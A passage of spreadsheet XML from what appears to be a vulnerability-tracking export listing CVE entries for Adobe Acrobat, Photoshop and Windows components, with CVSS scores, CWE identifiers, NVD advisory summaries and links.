      <c r="M2316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t>
        </is>
      </c>
    </row>
    <row r="2317">
      <c r="A2317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81988</t>
        </is>
      </c>
      <c r="C2317" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2317" s="5" t="inlineStr"/>
      <c r="F2317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2317" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2317" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2317" s="5" t="inlineStr"/>
      <c r="K2317" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2317" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t>
        </is>
      </c>
    </row>
    <row r="2318">
      <c r="A2318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81989</t>
        </is>
      </c>
      <c r="C2318" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2318" s="5" t="inlineStr"/>
      <c r="F2318" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2318" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2318" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2318" s="5" t="inlineStr"/>
      <c r="K2318" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2318" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t>
        </is>
      </c>
    </row>
    <row r="2319">
      <c r="A2319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81990</t>
        </is>
      </c>
      <c r="C2319" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2319" s="5" t="inlineStr"/>
      <c r="F2319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2319" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2319" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2319" s="5" t="inlineStr"/>
      <c r="K2319" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2319" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t>
        </is>
      </c>
    </row>
    <row r="2320">
      <c r="A2320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81992</t>
        </is>
      </c>
      <c r="C2320" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2320" s="5" t="inlineStr"/>
      <c r="F2320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2320" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2320" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2320" s="5" t="inlineStr"/>
      <c r="K2320" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2320" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t>
        </is>
      </c>
    </row>
    <row r="2321">
      <c r="A2321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="C2321" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2321" s="5" t="inlineStr"/>
      <c r="F2321" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2321" s="5" t="inlineStr"/>
      <c r="H2321" s="5" t="inlineStr"/>
      <c r="I2321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2321" s="5" t="inlineStr"/>
      <c r="K2321" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2321" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="2322">
      <c r="A2322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="C2322" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2322" s="5" t="inlineStr"/>
      <c r="F2322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2322" s="5" t="inlineStr"/>
      <c r="H2322" s="5" t="inlineStr"/>
      <c r="I2322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2322" s="5" t="inlineStr"/>
      <c r="K2322" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2322" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="2323">
      <c r="A2323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="C2323" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2323" s="5" t="inlineStr"/>
      <c r="F2323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2323" s="5" t="inlineStr"/>
      <c r="H2323" s="5" t="inlineStr"/>
      <c r="I2323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2323" s="5" t="inlineStr"/>
      <c r="K2323" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2323"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2323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="2324">
      <c r="A2324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="C2324" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2324" s="5" t="inlineStr"/>
      <c r="F2324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2324" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2324" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2324" s="5" t="inlineStr"/>
      <c r="K2324" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L2324" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="2325">
      <c r="A2325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="C2325" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2325" s="5" t="inlineStr"/>
      <c r="F2325" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2325" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H232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2325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2325" s="5" t="inlineStr"/>
      <c r="K2325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2325" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="2326">
      <c r="A2326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="C2326" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2326" s="5" t="inlineStr"/>
      <c r="F2326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2326" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2326" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2326" s="5" t="inlineStr"/>
      <c r="K2326" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2326" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="2327">
      <c r="A2327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="C2327" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2327" s="5" t="inlineStr"/>
      <c r="F2327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2327" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H232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27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2327" s="5" t="inlineStr"/>
      <c r="K2327" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2327" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="2328">
      <c r="A2328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="C2328" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2328" s="5" t="inlineStr"/>
      <c r="F2328" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2328" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H232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28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2328" s="5" t="inlineStr"/>
      <c r="K2328" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2328" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="2329">
      <c r="A2329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83959</t>
        </is>
      </c>
      <c r="C2329" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2329" s="5" t="inlineStr"/>
      <c r="F2329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2329" s="5" t="inlineStr"/>
      <c r="H2329" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="I2329" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2329" s="5" t="inlineStr"/>
      <c r="K2329" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2329" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83959</t>
        </is>
      </c>
    </row>
    <row r="2330">
      <c r="A2330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="C2330" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2330" s="5" t="inlineStr"/>
      <c r="F2330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2330" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2330" s="5" t="inlineStr"/>
      <c r="K2330" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2330" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="2331">
      <c r="A2331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="C2331" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2331" s="5" t="inlineStr"/>
      <c r="F2331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2331" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2331" s="5" t="inlineStr"/>
      <c r="K2331" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="L2331" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="2332">
      <c r="A2332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="C2332" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2332" s="5" t="inlineStr"/>
      <c r="F2332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2332" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2332" s="5" t="inlineStr"/>
      <c r="K2332" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2332" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="2333">
      <c r="A2333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="C2333" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2333" s="5" t="inlineStr"/>
      <c r="F2333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2333" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2333" s="5" t="inlineStr"/>
      <c r="K2333" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2333" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="2334">
      <c r="A2334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="C2334" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2334" s="5" t="inlineStr"/>
      <c r="F2334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2334" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2334" s="5" t="inlineStr"/>
      <c r="K2334" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2334" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="2335">
      <c r="A2335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="C2335" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2335" s="5" t="inlineStr"/>
      <c r="F2335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2335" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H23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35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2335" s="5" t="inlineStr"/>
      <c r="K2335" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2335" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="2336">
      <c r="A2336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="C2336" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2336" s="5" t="inlineStr"/>
      <c r="F2336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2336" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2336" s="5" t="inlineStr"/>
      <c r="I2336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2336" s="5" t="inlineStr"/>
      <c r="K2336" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2336" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="2337">
      <c r="A2337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="C2337" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2337" s="5" t="inlineStr"/>
      <c r="F2337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2337" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2337" s="5" t="inlineStr"/>
      <c r="K2337" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2337" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="2338">
      <c r="A2338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="C2338" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2338" s="5" t="inlineStr"/>
      <c r="F2338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2338" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2338" s="5" t="inlineStr"/>
      <c r="K2338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2338" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="2339">
      <c r="A2339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="C2339" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2339" s="5" t="inlineStr"/>
      <c r="F2339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2339" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H233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39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2339" s="5" t="inlineStr"/>
      <c r="K2339" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2339" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="2340">
      <c r="A2340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="C2340" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2340" s="5" t="inlineStr"/>
      <c r="F2340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2340" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2340" s="5" t="inlineStr"/>
